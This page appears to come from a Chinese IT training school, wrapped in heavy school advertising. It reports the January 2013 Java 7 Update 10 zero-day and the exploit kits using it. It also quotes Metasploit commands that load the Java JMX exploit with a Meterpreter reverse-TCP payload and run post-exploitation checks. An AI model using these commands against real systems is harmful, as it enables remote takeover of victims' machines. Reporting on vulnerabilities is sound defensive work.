新年初始，Java惊爆首个0day

不仅仅统招学历哟

热门专业！
大学校园！
就业保障！
拿学历又能高薪就业，谁能不爱！

了解详情>

让每一个家庭“安心”、“放心”

教学为本
师爱为魂
安心学习
放心就业

了解详情>

深耕细作IT职业教育15载

青鸟之星教学质量大奖
卓越风云人物
北大青鸟中心理事会成员
七项荣耀载誉而行！

了解详情>

我们教学怎么样

实力见证
网络组一等奖
网络组二等奖
软件组四等奖
200家校区脱颖而出！

了解更多>

北大青鸟职业IT20周年

重承诺
守信用
放心品牌
放心学习
靠靠谱谱好就业！

了解更多>

我命由我不由天

学个性的技术
做爱做的事
挣满意的钱
衣食无忧
选择宽且高大尚！

了解更多>

我们靠不靠谱

14年办学
14年磨练
14年成长
14年探索
只为让每个学员成材！

了解更多>

不打工也牛掰

好工作
好环境
高薪资
好课程
支持你成为有“钱”人！

了解更多>

学IT就读北大青鸟

好工作
好未来
好老师
好课程
支持你成为受人尊敬的人！

了解更多>

网络技术服务器管理数据库网络安全

作者：北大青鸟添加时间：01-20 浏览次数：0

11：00 UPDATE: MSF已更新相关渗透测试模块

use exploit/windows/browser/ie_cbutton_uaf

use exploit/multi/browser/java_jre17_jmxbean set SRVHOST 192+168+178+26 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192+168+178+26 exploit

sysinfo

getuid

详细链接及视频：

http://eromang+zataz+com/2013/01/10/java-applet-jmx-0day-remote-code-execution-metasploit-demo/

新年伊始，人们还沉浸在节日的欢乐气氛中，Java又赠送给大家一份豪礼，让各位欢欢乐乐过个大年。日前，Java又爆了一个新的0day，可能让攻击者获取计算机管理权限，Java 7 Update 10或更早的版本中存在该漏洞，该漏洞可以允许未经身份验证的远程攻击者在受害者系统上执行任意代码，该漏洞首先在‘Malware Don’t Need Coffee’博客上发表。

目前该漏洞在网络有两个EXP,分别出售价格为700美元和1500美元，在去年八月发现的CVE-2012-4681漏洞中使用的是类似的手法，查看地址。

两个EXP被黑客用来传播恶意软件，国外著名的黑名工具包BlackHole Exploit Kit和Cool Exploit Kit已经更新了该EXP。

BlackHole作者Paunch昨天在网络公布，称在BlackHole添加该JAVA 0day是送给软件用户的新年福利，经AlienVault Labs确认，BlackHole工具中使用的EXP证实为Java最新的漏洞。

US-CERT也发出了VU#625617预警。未受信任的Java applet可通过调用setSecurityManager()函数提升权限，从而在没有代码签名的情况下获得 full privileges。

更多截获到的攻击样本请见：

http://malware+dontneedcoffee+com/2013/01/0-day-17u10-spotted-in-while-disable+html

该漏洞影响分布图如下：